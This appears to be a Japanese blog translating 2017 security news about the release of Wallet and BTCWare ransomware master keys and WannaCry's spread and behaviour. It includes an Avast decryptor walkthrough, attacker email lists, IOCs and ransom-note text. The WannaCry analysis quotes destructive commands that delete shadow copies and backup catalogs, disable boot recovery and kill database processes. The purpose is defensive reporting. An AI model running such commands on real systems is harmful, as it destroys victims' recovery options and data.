     今朝、BleepingConputer.comの新規登録メンバーが、我々のフォーラムにWallet身代金要求型マルウェア用のマスター復号キーを投稿した。この投稿は、lightsentineloneと名乗るメンバーが、Dharma Ransomware Support Topicに米国東部時間9:13(日本時間、5月18日 22:15)に作成したものであり、Pastebinへのリンクを含んでいた。


     リリースされたWalletキーに関するBleepingComputer.comへの投稿

     このPastebinへの投稿は、正当なものと確認された198の復号キーを含むCヘッダーファイルで構成されており、Wallet身代金要求型マルウェア復号プログラムを作成するためにセキュリティ研究者によって使用された。
     この身代金要求型マルウェアは、以下に見られるように恐ろしく広汎に拡散しているので、この復号プログラムのリリースで、多くの犠牲者がファイルを復号できたと投稿してくることを想像できる。


     Dharma感染色分け地図

     そこで、あなたが身代金要求型マルウェアに感染し、身代金を支払う意思がないのであれば、将来復号プログラムがリリースされた場合に備えて、あなたの暗号化されたファイルを安全な場所に格納しておきなさい。
     この復号プログラムの使用に支援を必要としたり、問題に遭遇した人は誰でも、専用のDharma Ransomware Help & Support Topicで、我々に知らせなさい。

    何故Wallet身代金要求型マルウェアの開発者は復号キーをリリースしたのか?

     Walletの属する身代金要求型マルウェアのCrysisファミリーは、彼等が新しい拡張子に切り替えた時、それまでの変種のマスター復号キーをリリースすることを常としている。例えば、2016/11/14、Crysisマスター復号キーは、BleepingComputer上にリリースされた。2017/03/01、DharmaキーがBleepingComputer上にリリースされた。そして本日、我々は、Walletのキーをリリースされた。
     この身代金要求型マルウェア ファミリーは、最近 .onion 拡張子を使用するように切り替えたので、今迄のバージョンのキーがリリースされたところで驚くことではない。
     これは、この身代金要求型マルウェアの開発者が使用しているパターンを示しているが、彼等がキーをリリースしている理由を説明しているわけではない。この時点で、身代金を支払う意思のある者は、既に支払っているだろう。そこで、彼等が善意から、これを実行しているということはあり得ることである。それ故、キーをリリースしても、彼等の利益を損なわれることはなく、影響を受けた人々の顔色を良くするだけである。
     願わくば、この挙動は、かれらが最早収益を挙げることのなくなった古いバージョン用のキーをリリースする意思があるかもしれない他の開発者によって模倣されるだろうことを。

    Crysis用のAvast復号ツールを使用してWalletを復号する方法(Onionも可能かもしれない)

    アップデート(2017/05/20): リリースされたマスター復号キーは、.onion変種で感染した人の一部を復号しているかのようである。従って、あなたが、.onion拡張子で構成されるファイル暗号化に感染しているのであれば、あなたのファイルに関して動作する可能性があるので、この復号ツールを試すべきである。

    Wallet身代金要求型マルウェアの犠牲者は、ファイルが、[filename].[email].walletの形式に暗号化され、リネームされていることで同定することができる。たとえば、最近の変種は、test.jpgと名付けられていたファイルを、test.jpg.[destroed_total@aol.com].walletとして暗号化している。
     あなたは、暗号化されたファイルのフォルダの例を以下に見ることができる。 


     Walletで暗号化されたファイル

     わたしはまた、この記事の末尾に、完全なeMailアドレスのリストを含めた。ID-RansomewareMichael Gillespieに感謝する。
     Wallet身代金要求型マルウェアによって暗号化されたファイルを復号するには、コチラ(http://files.avast.com/files/decryptor/avast_decryptor_crysis.exe)から、AvastのCrysis Decryptorを最初にダウンロードする。
     ダウンロードしたら、このプログラムをダブルクリックし、メイン画面を表示する。


     Crysis用Avast復号ツール

     開始する前に、必ず、Wallet身代金要求型マルウェアの本日リリースされたキーをサポートしているバージョンである 1.0.103.0 を使用していることを確認する必要がある。この復号ツールのバージョンをチェックするには、上の画像中に見られるプログラムのタイトルバーに注目しなさい。あなたが正しいバージョンを使用しているのであれば、進行するためにNextボタンをクリックしなさい。
     これで、暗号化されたファイルを復号するためにスキャンしたい任意のドライブを追加するための画面になる。


     Crysis用Avast復号ツール

     上の画面で、未だ選択されていないドライブを追加し、次にNextボタンをクリックする。
     ここで、この復号ツールが機能する方法に関する様々なオプションを選択する画面になる。


     復号オプション画面

     この二つのオプションをチェックしたままにして、ファイルの復号を開始するためにDecryptボタンをクリックする。この復号プログラムは管理者権限で実行する必要があるので、UACプロンプトが表示され、このまま実行するか否か尋ねられるだろう。安全なので、このプロンプトではYesを押す。
     この復号プログラムは、選択されているドライブをスキャンし、検出された暗号化されたファイルを復号するだろう。


     ファイル復号中

     このプロセスには大変な時間がかかるので、この復号プログラムが、コンピュータをスキャンし、ファイルを復号している間は我慢しなさい。どの位の時間がかかるのかの目安としては、私のテスト コンピュータは大変僅かなファイルしか持っていなかったが、30分以上かかった。コンピュータが多くのファイル(特に大きなファイル)を持っている場合には、このプロセスは大変長い時間が掛かるだろう。
     この復号プログラムが終了すると、復号されたファイルの数を示す概要のページが表示される。


     復号完了

     あなたのファイルは復号されたが、オリジナルの暗号化されたファイルは依然としてあなたのコンピュータに残存している。ファイルが適切に復号されたことを確認したら、あなたの暗号化されたファイルの全てを特定のフォルダに移動するためにCryptoSearchを使用しなさい。これで、それらを削除したりアーカイブしたりすることができる。

     これで、この復号プログラムを終了することができ、あなたのコンピュータを通常通り使用することができる。この復号プログラムの使用に支援を必要とするのであれば、Dharma Ransomware Help & Support Topicで質問しなさい。

    既知のWallet eMailアドレス

      3048664056@qq.com
      age_empires@aol.com
      aligi@zakazaka.group
      amagnus@india.com
      amanda_sofost@india.com
      braker@plague.life
      breakdown@india.com
      crann@india.com
      crann@stopper.me
      crannbest@foxmail.com
      cryalex@india.com
      Cryptime@india.com
      crysis@indya.life
      danger_rush@aol.com
      dderek416@gmail.com
      dderek@india.com
      ded_pool@aol.com
      denied@india.com
      destroed_total@aol.com
      diablo_diablo2@aol.com
      donald_dak@aol.com
      dropped@india.com
      enterprise_lost@aol.com
      fedor2@aol.com
      fidel_romposo@aol.com
      fire.show@aol.com
      first_wolf@aol.com
      flashprize@india.com
      fly_goods@aol.com
      gotham_mouse@aol.com
      grand_car@aol.com
      gutentag@india.com
      HelpRobert@gmx.com
      ice_snow@aol.com
      info@kraken.cc
      injury@india.com
      interlock@india.com
      joker_lucker@aol.com
      kuprin@india.com
      last_centurion@aol.com
      lavandos@dr.com
      legionfromheaven@india.com
      m.reptile@aol.com
      m.subzero@aol.com
      makedonskiy@india.com
      mandanos@foxmail.com
      matacas@foxmail.com
      mission_inposible@aol.com
      mission_inpossible@aol.com
      mk.baraka@aol.com
      mk.cyrax@aol.com
      mk.goro@aol.com
      mk.jax@aol.com
      mk.johnny@aol.com
      mk.kabal@aol.com
      mk.kitana@aol.com
      mk.liukang@aol.com
      mk.noobsaibot@aol.com
      mk.raiden@aol.com
      mk.rain@aol.com
      mk.scorpion@aol.com
      mk.sektor@aol.com
      mk.sharik@aol.com
      mk.smoke@aol.com
      mk.sonyablade@aol.com
      mk.stryker@aol.com
      mkgoro@india.com
      mkjohnny@india.com
      MKKitana@india.com
      Mkliukang@india.com
      mknoobsaibot@india.com
      mkscorpion@india.com
      MKSmoke@india.com
      mksubzero@india.com
      moneymaker2@india.com
      nicecrypt@india.com
      nomascus@india.com
      nort_dog@aol.com
      nort_folk@aol.com
      obamausa7@aol.com
      p_pant@aol.com
      reserve-mk.kabal@india.com
      sammer_winter@aol.com
      shamudin@india.com
      sman@india.com
      smartsupport@india.com
      spacelocker@post.com
      space_rangers@aol.com
      ssama@india.com
      stopper@india.com
      supermagnet@india.com
      support_files@india.com
      tanksfast@aol.com
      terrabyte8@india.com
      total_zero@aol.com
      versus@india.com
      walmanager@qq.com
      warlokold@aol.com
      war_lost@aol.com
      webmafia@asia.com
      webmafia@india.com
      xmen_xmen@aol.com
      zaloha@india.com


    BTCWare身代金要求型マルウェアのマスターキーがリリースされ、無料復号ツールが利用可能になった
    BleepingComputer : News>Security (2017/05/16)
     BTCWareの古いバージョンで暗号化されたファイルを所有するユーザは、セキュリティ研究者が、この身代金要求型マルウェア ファミリーの復号プログラムを作成したので、無料でファイルを修復することができる。この復号プログラムに関する作業は、4月末に開始された。
     月始めにBTCWare復号プログラムの初期バージョンのリリースに続き、或るユーザが、BleepingComputerフォーラムのBTCWare身代金要求型マルウェア用のマスター復号キーをリリースした。このユーザ(彼自身はchecker123と名乗っている)が、BTCWare身代金要求型マルウェアの作者なのか、彼等のライバルを妨害しようとする競合する身代金要求型マルウェア チームのメンバーなのか定かでないが、何れにせよ我々は嬉しく思う。たとえ、彼が我々のコメントの要請に対応しなくとも、我々は、checker123が、この身代金要求型マルウェアの作者であると思っている。

    BTCWareは大変アクティブな身代金要求型マルウェア株である

     BTCWare身代金要求型マルウェアは、セキュリティ研究者MalwareHunterKarsten Hahnが、その最初のバージョン(当初CrptXXXとして知られていた)を偶然見つけた3月初旬に、マルウェアシーンにその存在を印象づけた。


     CrptXXX脅迫文

     我々が後にBTCWareあるいはCryptoByteと呼び始めた新しいバージョンが一週間後現れ、そして、その後に新し変種が現れた。


     BTCWare脅迫文(画像をクリックすると拡大します)

     CerberやSporaほど流行していないが、BTCWareは、殆どの人々が考えているより成功している。ID-Ransomwareサービスによって提供された、この感染図表に基づくと、この身代金要求型マルウェアは、一日平均凡そ10感染している。これは、SageやLockyのような、もっと有名な同種のマルウェアの一部と同じレベルである。


     BTCWare感染統計(画像をクリックすると拡大します)


     2017年4月初旬での身代金要求型マルウェア感染統計(画像をクリックすると拡大します)

     発見されて以来、我々は三つのメジャーなBTCWareバージョン(それらが暗号化したファイルの末尾に追加したファイル拡張子で識別可能)を見てきた。

    .[< email address >].btcware
    .[< email address >].cryptobyte
    .[< email address >].cryptowin
    .[< email address >].theva

     これらの二つに関しては、セキュリティ研究者Francesco Muroniが既に、暗号をブルート・フォースし、復号キーを取得するスクリプトを作成している。この二つとは、.btcware と .crptobyteである。このスクリプトは、コマンドラインを使用することから通常ユーザが使用するのは難しかったので、セキュリティ研究者Michael Gillespieは、見栄えのするGUIを作成した。


     checker123が、BTCWareマスターキー(全ての犠牲者用の普遍的復号キー)をリリースした後、Gillespieは、その有効性をテストし、.btcware と .cryptowinの変種に関しても動作することを発見した。
     これは、このマスター復号キーを使用しようと、暗号化スキームをブルートフォースする今までの方法を使用しようとも、最初の三つのBTCWareバージョンを復号する方法が現在存在していることを意味している。
     過去二週間に渡り、Gillespieは、checker123によって本日リリースされたマスターキーを含ませるように、今迄のBTCWare Decrypterのアップデート作業をしてきており、この研究者が復号プログラムの最適化を終了した時点であったが、彼は三つ目のバージョンを同様にブルート・フォースする方法を発見した。
     現在、BTCWare DecrypterはDefaultでブルート・フォースを使用するが、信頼性は向上している。BTCWareに感染したユーザは、ファイルを復元するために、この復号プログラムを使用することができる。ユーザは、コチラをクリックして復号プログラムをダウンロードできる。以下は、Michaelの指示である。

     あなたのキーを抽出するためには、暗号化されたファイルと、そのオリジナルのファイルの両方を必要とする。Settings -> Find Key に移動し、このファイルをロードする。次に、ブルート・フォースを開始する。このプログラムがキーを発見すると、ダイアログが閉じ、キーがロードされる。これで、選択されているディレクトリを復号するための準備ができた。

    復号プログラムはOnyonware用のサポートを追加してアップデートされるだろう

     この記事は当初、5月4日に記述されたが、Gillespieが、この復号プログラムの最適化作業をしていたために公開されなかった。更に時が経ち、BTCWareのマスターキーが我々のフォーラムにリークされた理由が明らかになった。
     このBTCWareの作者(達)は、数日後(5月9日)に、彼等の身代金要求型マルウェアを、暗号化したファイルの末尾に ".[< email >].theva" 拡張子を付ける新しいバージョンにアップデートした。更に、昨日(5月15日)、彼/彼等は、Onyonwareと名付けられた新しい身代金要求型マルウェアを作成し起動した。
     後で分かったことだが、古いBTCWareバージョンのマスターキーをリリースすることは、彼等の活動に、そんなにダメージを与えることはない。身代金要求型マルウェアの作者は、彼等が新しい身代金要求型マルウェアの変種を終えると、時々マスター復号キーをリリースする。これは、おそらく好意からと思われるが、その時点で、彼等は新しい身代金要求型マルウェアのバージョンに移行しており、古いバージョンに感染して身代金を支払おうとしている犠牲者は、既に支払いを終えているためである。
     本日、Twitterで、BTCWare DecrypterがOnyonwareをサポートするようにしたことを、Gillespieは確認した。この研究者は、彼が4番目のBCTWareバージョンを解決できるか否か、依然として調査している。

    【訳注】 この後、checker123によるフォーラムへのポスト等が続きますが、省略します。


    Wana Decryptor / WannaCrypt0rnによる巨大攻撃について
    BBC:Technology / BleepingComputer:News>Security (2017/05/13)
    【訳注】 幾つかの報道を纏めてあります。

    BBCから(日本時間、8:00頃にリリースされた記事から)

     米国国家安全保障局によって開発されたと信じられているツールを使用した巨大なサイバー攻撃が世界中の組織を攻撃している。
     各地の数千のコンピュータがBitcoinで、$300(£230、約33566円)を要求するプログラムでロックされた。
     4月、The Shadow Brokersとして知られるハッカーは、このツールを盗み出し、それらをオンラインにリリースしたと主張していた。
     Microsoftは、3月にこの脆弱性に関するパッチをリリースしたが、多くのシステムがアップデートされていない可能性がある。
     この感染は、イギリス、アメリカ、中国、ロシア、イタリア、台湾を含む99ヵ国に感染しているとレポートされている。

    BleepingComputerが、日本時間、5:00頃にリリースした記事から

     感染している国のチャート。


     画像をクリックすると拡大します

    地に落ちたWana Decryptor / WannaCrypt0rn技術(BleepingComputerより、全文和訳)

     Telefonica(テレフォニカ。【訳注】 スペイン・マドリードに本拠を置く大手通信事業者)、中国の大学群、ロシア内務省、他の組織に巨大な身代金要求型マルウェアを急激に増加させることにより世界中に嵐を見舞ったことにより、本日は、WannaCrypt0r身代金要求型マルウェアにとって重要な日となった。BleepingComputerが、この勃発を詳細にカバーすることで、このマルウェアを取り扱う可能性のあるIT分野の人々が、このマルウェアの動作方法の基本を理解をすることが、WannaCrypt0r身代金要求型マルウェアを低下させるための適切な考えであると、私は思う。
     残念ながら、現時点で、WannaCrypt0rで暗号化されたファイルは、無料で復号することはできない。あなたが、この身代金要求型マルウェアの支援とサポートを必要としているのであれば、BleepingComputerは、専門のWannaCrypt0r Wana Decrypt0r Help & Support Topicをセットアップしている。

    この身代金要求型マルウェアは、WannaCryptor, WannaCrypt0r, Wana Decrypt0rと呼ばれている

     この身代金要求型マルウェアの公式の内部名はWannaCrypt0rであるが、あなたが、このマルウェアを別名で呼んでいる新しい記事を読むことがあるだろう。これは、この身代金要求型マルウェアが、Wana Decrypt0r 2.0と呼ばれるロックスクリーン/復号プログラム を持っていることによる。このプログラムは、全ての犠牲者が、感染させられたデスクトップ上に見るものであり、異なる内部名であり、WNCRY拡張子でファイルを暗号化している。
     では、我々は、このマルウェアを何と呼べばいいのか? 私は、このマルウェアの実名であるWannaCrypt0rに固定すべきであると考える。残念ながら、殆どの人々は、彼等が見た最初のものがWana Decrypt0rと名付けられたロックスクリーンであるがために、このマルウェアをWannaCrypt0rと呼ばないだろう。WanaDecrypt0rは、殆どの人々が検索に使用する名前なので、我々は、この記事では、このマルウェアをWanaDecrypt0rもしくはWannaCrypt0rと呼ぶことにする。

    WannaCrypt0rは、どのように拡散しているのか?

     MalwareHunterTeamは、数週間前に最初にWannaCrypt0r見つけたが、この身代金要求型マルウェアは、この数週間の間の大部分に関して、殆ど拡散しなかった。突然、WannaCrypt0rは爆発し、ETERNALBLUEと呼ばれるエクスプロイト(【訳注】 スクリプト、あるいはプログラムの1つで、コンピュータ関連においてソフトウェアやハードウェアの脆弱性を利用し、悪意を持った行為のために書かれたもの(IT用語辞典より))を介して燎原の火の如く拡散し始めた。ETERNALBLUEは、米国安全保障局のエクスプロイトであると言われ、The Shadow Brokerと呼ばれるハッキンググループによって先月オンラインにリークされた
     このエクスプロイトは、SMBv1プロトコルを介してリモートマシンへのアクセスを取得することで動作する。残念ながら、Microsoftが3月にこのフローをパッチ(MS17-010)していたにも拘わらず、多くの人々は、このパッチをインストールしていなかったようである。
     あなたが、MS17-010セキュリティ ブレティンで言及されているアップデートをインストールしていないのであれば、現在実行している全てのことを停止し、このパッチをインストールしなさい。もちろん、これは重要なことなので、私は既に実行済みである。この身代金要求型マルウェアは、気が狂ったかのように拡散中であり、無料での復号方法を知られていない。それ故、感染してファイルを失わないように、このアップデートをインストールしなさい。

    WannaCrypt0rは、どのようにコンピュータを暗号化しているのか?

     コンピュータがWana Decrypt0rに感染すると、このインストーラは、同じフォルダ中にある埋め込まれたファイルを解凍する。この埋め込まれたリソースは、パスワードで保護されたZIPファイルであり、WannaCrypt0rによって使用され実行される様々なファイルを含んでいる。


     埋め込まれているパスワードで保護されたZIPファイル(画像をクリックすると拡大します)

     WanaDecrypt0rローダーは、このZIPファイルのコンテンツを、このローダーと同じフォルダに解凍し、幾つかのスタートアップ タスクを実行する。これは最初に、msgフォルダに、ローカライズされた(【訳注】 犠牲者の国の言語に対応した)脅迫文を抽出する。現在サポートされている言語は以下である。

    ブルガリア語、中国語(簡字体、繁字体)、クロアチア語、チェコ語、オランダ語、デンマーク語、英語、フィリピン語
    フィンランド語、フランス語、ドイツ語、ギリシャ語、インドネシア語、イタリア語、日本語、韓国語、ラトビア語
    ノルウェー語、ポーランド語、ポルトガル語、ルーマニア語、ロシア語、スロバキア語、スペイン語、スウェーデン語
    トルコ語、ベトナム語
     次に、WannaCrypt0rは、https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zipからTORクライアントをダウンロードし、TaskDataフォルダに解凍する。このTORクライアントは、gx7ekbenv2riucmf.onion, 57g7spgrzlojinas.onion, xxlvbrloxvriy2c5.onion, 76jdd2ir2embyv47.onion, cwwnhwhlz52maqm7.onionで、この身代金要求型マルウェアのコマンド&コントロール サーバと通信するために使用される。
     可能な限り多くのファイルを暗号化できるようにコンピュータを下調べするために、icacls . /grant Everyone:F /T /C /Q コマンドを、ここで実行する。これで、この身代金要求型マルウェアが実行されているフォルダとチャイルド フォルダに配置されているファイルに対して全ての者がフルパーミッションを持つように変更される。次に、データベースとメールストアを同様に暗号化し、データベースサーバとメールサーバに関連するプロセスを終了する。
     このデータベース プロセスを終了するために実行されるコマンドは以下である。

    taskkill.exe /f /im mysqld.exe
    taskkill.exe /f /im sqlwriter.exe
    taskkill.exe /f /im sqlserver.exe
    taskkill.exe /f /im MSExchange*
    taskkill.exe /f /im Microsoft.Exchange.*

     これで、Wana Decrypt0rは、コンピュータ上のファイルの暗号化を開始する準備ができた。ファイルを暗号化している時、Wana Decrypt0rは、以下の拡張子を持っているファイルだけを暗号化する。

    .der, .pfx, .key, .crt, .csr, .pem, .odt, .ott, .sxw, .stw, .uot, .max, .ods, .ots
    .sxc, .stc, .dif, .slk, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay
    .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi
    .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .vbs, .dip, .dch, .sch
    .brd, .jsp, .php, .asp, .java, .jar, .class, .wav, .swf, .fla, .wmv, .mpg, .vob
    .mpeg, .asf, .avi, .mov, .mkv, .flv, .wma, .mid, .djvu, .svg, .psd, .nef, .tiff
    .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar
    .tgz, .tar, .bak, .tbk, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx
    .sti, .sxi, .hwp, .snt, .onetoc2, .dwg, .pdf, .wks, .rtf, .csv, .txt, .vsdx, .vsd
    .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm
    .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls
    .dotx, .dotm, .dot, .docm, .docb, .docx, .doc,

     ファイルが暗号化されると、この身代金要求型マルウェアは、ファイルが暗号化されたことを意味する .WNCRY 拡張子を暗号化したファイルに追加する。例えば、test.jpgファイルが暗号化されると、test.jpg.WNCRYに名前が変わる。


     WNCRY暗号化されたファイルのフォルダ(画像をクリックすると拡大します)

     ファイルを暗号化している時、Wana Decrypt0rはまた、@Please_Read_Me@.txt脅迫文と、ファイルを暗号化した全てのフォルダに@WanaDecryptor@.exe復号プログラムのコピーを格納する。我々は後で、これらのファイルを見るだろう。
     最後に、WannaCrypt0rは、シャドー・ボリューム・コピーを削除し、Windowsスタートアップ・リカバリを無効化し、Windows Serverバックアップ履歴を削除するために幾つかのコマンドを実行する。発生するコマンドは以下である。

    C:\Windows\SysWOW64\cmd.exe /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

     これらのコマンドは管理者権限を必要とするので、犠牲者は以下に見られるようなUAC(ユーザーアカウント制御)プロンプトを表示されるだろう。


     ユーザーアカウント制御

     最終的に、Wana Decryptor 2.0ロック画面が表示される。この画面は、身代金の支払い方法と、あなたが上にリストした言語の一つを選択することが可能であるという追加情報を含んでいる。


     Wana Decrypt0r 2.0ロック画面(画像をクリックすると拡大します)

     あなたが、Check Paymentボタンをクリックすると、この身代金要求型マルウェアは、支払いが実行されているか否か確認するためにTORコマンド&コントロール サーバへの接続を回復させる。支払いが実行されていれば、この身代金要求型マルウェアは、自動的にあなたのファイルを復号する。支払いが実行されていない場合は、以下のような対応を見ることになる。


     支払いが実行されていない場合の対応

     WannaCrypt0r身代金要求型マルウェアは、三つのハードコードされたBitcoinアドレスを持っている。これらのBitcoinアドレスは、13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw, 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLnである。私は何かを見落としているかもしれないが、私が理解できないことは、大変多くの人々が同じBitcoinアドレスを使用したなら、この身代金要求型マルウェアの開発者は、どのようにして、支払っていない犠牲者と支払いをした犠牲者を識別することが可能なのかということである。
     例えば、誰かが私に割り当てられたBitcoinアドレスに身代金を支払ったとしても、依然として、このプログラムは、私が支払っていないと宣言している。
     このWana Decryptor 2.0画面はまた、あなたがこの身代金要求型マルウェアの開発者に連絡を取るためのフォームを開くことのできるContact Usを持っている。


     Contuct Usのフォーム

     また、この身代金要求型マルウェアは、あなたのデスクトップ壁紙を、以下に示す別の脅迫文に差し替えるだろう。


    デスクトップ壁紙(画像をクリックすると拡大します)

     大事なことを言い忘れていたが、脅迫文は、詳細情報とFAQ(よくある質問)の回答を含んでデスクトップ上に放置されるだろう。


    @Please_Read_Me@.txt脅迫文(画像をクリックすると拡大します)

     先述したように、残念ながら、この身代金要求型マルウェアは無料で復号することができない。あなたの最善の処置はバックアップから修復することである。もしもバックアップが存在しないのであれば、この身代金要求型マルウェアが、適切にシャドー・ボリューム・コピーを削除していないことに一縷の望みを抱いてShadow Explorerのようなプログラムを試すことである。ユーザがUACプロンプトでYesをクリックしなかった人々は、修復可能なチャンスが存在している。
     シャドー・ボリューム・コピーからファイルを修復するガイドは、How to recover files and folders using Shadow Volume Copiesに発見される。
     あなたが、この身代金要求型マルウェアで支援とサポートを必要とするのであれば、BleepingComputerは、専門のWannaCrypt0r Wana Decrypt0r Help & Support Topicをセットアップしている。

    Wana Decrypt0rを、どのようにして防御すればいいのか?

     新しい脅威からあなたを保護するために挙動防御を活用するセキュリティソフトウェアをアップデートすることとは別に、あなたのコンピュータに最新のWindowsセキュリティ アップデートの全てをインストールしておくことは回避できないことである。一部の企業に関して、最新のセキュリティアップデートが出現した時それらをインストールすることが、彼等の「パッチの管理指針」の一部ではないことを、私は認識しているが、疑われている米国国家保安局のリモート・エクスプロイトを修正するアップデートは、当に優先されなければならない。
     何らかの理由から、全てのWindowsアップデートをインストールすることが不可能であるのなら、あなたは、少なくともMicrosoftのセキュリティ・ブレティンMS17-010で論議されているアップデートはインストールしなければならない。セキュリティ研究者Bartはまた、SMBv1は最先端のWindowsでは必ず使用しなければならないものではないので、SMBv1を無効にするように推奨している。SMBv1を無効化する方法に関しては、同様にMS17-010ブレティン中に見出すことができる。  素晴らしい挙動検出付きのソフトウェア製品に関しては、私は、Emsisoftの挙動ブロック・コンポーネントであるEmsisoft Anti-Malwareを強く推奨する。あなたは大きな安心を得るだけでなく、彼等の挙動ブロッカーは、新しい0−Dayの身代金要求型マルウェアがコンピュータを暗号化することを妨げることに驚くべき実績がある。
     以下は、私がEmsisoft Anti-MalwareのBehavior Blocker(挙動ブロッカー)を有効にした状態で、Wana Decrypt0rインストーラを実行させた時に発生したことである。

     残念ながら、この挙動ブロッカーは有料版でのみ利用可能なので、この機能の便益を享受するには、Emsisoft Anti-malwareを購入する必要がある。
     あからさまに言うと、あなたが上のリンクからEmsisoft Anti-Malwareを購入すると、我々は歩合をもらうことができる。そう云う訳で、私がこのプログラムを信じており、身代金要求型マルウェアや他のマルウェアから、あなたを防御する大変素晴らしい仕事を実行できることから、私はEmsisoft Anti-malwareだけを推奨する。

    IOC

    Hashes
    SHA256: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

    Wana Decrypt0r / WannaCrypt0r関連ファイル
    [Installed_Folder]\00000000.eky
    [Installed_Folder]\00000000.pky
    [Installed_Folder]\00000000.res
    [Installed_Folder]\@WanaDecryptor@.exe
    [Installed_Folder]\@WanaDecryptor@.exe.lnk
    [Installed_Folder]\b.wnry
    [Installed_Folder]\c.wnry
    [Installed_Folder]\f.wnry
    [Installed_Folder]\msg\
    [Installed_Folder]\msg\m_bulgarian.wnry
    [Installed_Folder]\msg\m_chinese (simplified).wnry
    [Installed_Folder]\msg\m_chinese (traditional).wnry
    [Installed_Folder]\msg\m_croatian.wnry
    [Installed_Folder]\msg\m_czech.wnry
    [Installed_Folder]\msg\m_danish.wnry
    [Installed_Folder]\msg\m_dutch.wnry
    [Installed_Folder]\msg\m_english.wnry
    [Installed_Folder]\msg\m_filipino.wnry
    [Installed_Folder]\msg\m_finnish.wnry
    [Installed_Folder]\msg\m_french.wnry
    [Installed_Folder]\msg\m_german.wnry
    [Installed_Folder]\msg\m_greek.wnry
    [Installed_Folder]\msg\m_indonesian.wnry
    [Installed_Folder]\msg\m_italian.wnry
    [Installed_Folder]\msg\m_japanese.wnry
    [Installed_Folder]\msg\m_korean.wnry
    [Installed_Folder]\msg\m_latvian.wnry
    [Installed_Folder]\msg\m_norwegian.wnry
    [Installed_Folder]\msg\m_polish.wnry
    [Installed_Folder]\msg\m_portuguese.wnry
    [Installed_Folder]\msg\m_romanian.wnry
    [Installed_Folder]\msg\m_russian.wnry
    [Installed_Folder]\msg\m_slovak.wnry
    [Installed_Folder]\msg\m_spanish.wnry
    [Installed_Folder]\msg\m_swedish.wnry
    [Installed_Folder]\msg\m_turkish.wnry
    [Installed_Folder]\msg\m_vietnamese.wnry
    [Installed_Folder]\r.wnry
    [Installed_Folder]\s.wnry
    [Installed_Folder]\t.wnry
    [Installed_Folder]\TaskData\
    [Installed_Folder]\TaskData\Data\
    [Installed_Folder]\TaskData\Data\Tor\
    [Installed_Folder]\TaskData\Tor\
    [Installed_Folder]\TaskData\Tor\libeay32.dll
    [Installed_Folder]\TaskData\Tor\libevent-2-0-5.dll
    [Installed_Folder]\TaskData\Tor\libevent_core-2-0-5.dll
    [Installed_Folder]\TaskData\Tor\libevent_extra-2-0-5.dll
    [Installed_Folder]\TaskData\Tor\libgcc_s_sjlj-1.dll
    [Installed_Folder]\TaskData\Tor\libssp-0.dll
    [Installed_Folder]\TaskData\Tor\ssleay32.dll
    [Installed_Folder]\TaskData\Tor\taskhsvc.exe
    [Installed_Folder]\TaskData\Tor\tor.exe
    [Installed_Folder]\TaskData\Tor\zlib1.dll
    [Installed_Folder]\taskdl.exe
    [Installed_Folder]\taskse.exe
    [Installed_Folder]\u.wnry
    [Installed_Folder]\wcry.exe

    Wana Decrypt0r / WannaCrypt0r関連レジストリ エントリ
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[random]      "[Installed_Folder]\tasksche.exe"
    HKCU\Software\WannaCrypt0r\
    HKCU\Software\WannaCrypt0r\wd      [Installed_Folder]
    HKCU\Control Panel\Desktop\Wallpaper      "[Installed_Folder]\Desktop\@WanaDecryptor@.bmp"

    Wana Decrypt0r / WannaCrypt0r通信ネットワーク
    gx7ekbenv2riucmf.onion
    57g7spgrzlojinas.onion
    xxlvbrloxvriy2c5.onion
    76jdd2ir2embyv47.onion
    cwwnhwhlz52maqm7.onion
    https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

    Wana Decrypt0r / WannaCrypt0rロック画面テキスト
    What Happened to My Computer?
    Your important files are encrypted.
    Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.

    Can I Recover My Files?
    Sure. We guarantee that you can recover all your files safely and easily. But you have not so enough time.
    You can decrypt some of your files for free. Try now by clicking .
    But if you want to decrypt all your files, you need to pay.
    You only have 3 days to submit the payment. After that the price will be doubled.
    Also, if you don't pay in 7 days, you won't be able to recover your files forever.
    We will have free events for users who are so poor that they couldn't pay in 6 months.

    How Do I Pay?
    Payment is accepted in Bitcoin only. For more information, click .
    Please check the current price of Bitcoin and buy some bitcoins. For more information, click .
    And send the correct amount to the address specified in this window.
    After your payment, click . Best time to check: 9:00am - 11:00am GMT from Monday to Friday.
    Once the payment is checked, you can start decrypting your files immediately.

    Contact If you need our assistance, send a message by clicking .

    We strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets updated and removes this software automatically, it will not be able to recover your files even if you pay!

    Wana Decrypt0r / WannaCrypt0r脅迫文
    Q: What's wrong with my files?

    A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
    If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
    Let's start decrypting!

    Q: What do I do?

    A: First, you need to pay service fees for the decryption.
    Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

    Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software.
    Run and follow the instructions! (You may need to disable your antivirus for a while.)

    Q: How can I trust?

    A: Don't worry about decryption.
    We will decrypt your files surely because nobody will trust us if we cheat users.

